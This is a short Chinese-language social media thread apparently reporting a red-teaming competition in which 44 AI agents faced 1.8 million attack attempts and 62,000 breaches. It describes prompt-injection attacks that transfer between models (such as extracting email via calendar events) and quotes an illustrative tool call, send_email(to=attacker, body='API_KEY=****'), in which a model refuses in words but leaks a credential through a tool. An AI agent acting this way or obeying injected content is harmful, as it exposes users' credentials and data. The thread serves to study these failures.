我们部署了44个AI代理,并向互联网提供了17万美元来攻击它们。 180万次尝试,62000次突破,包括数据泄露和财务损失。 🚨 令人担忧的是,相同的漏洞会转移到实时生产代理上……(例如:通过日历事件提取电子邮件)🧵
许多漏洞是普遍存在且可转移的。 复制粘贴的模式在任务、模型和保护措施之间有效。如果今天它使一个代理失效,它很可能也会使你的失效。
最喜欢的失败:“在文本中拒绝,在工具中行动。” 😈 模型:“我不能分享凭证。” 然后:send_email(to=attacker, body="API_KEY=****") 用户界面看起来安全;工具层造成了损害。
466.6K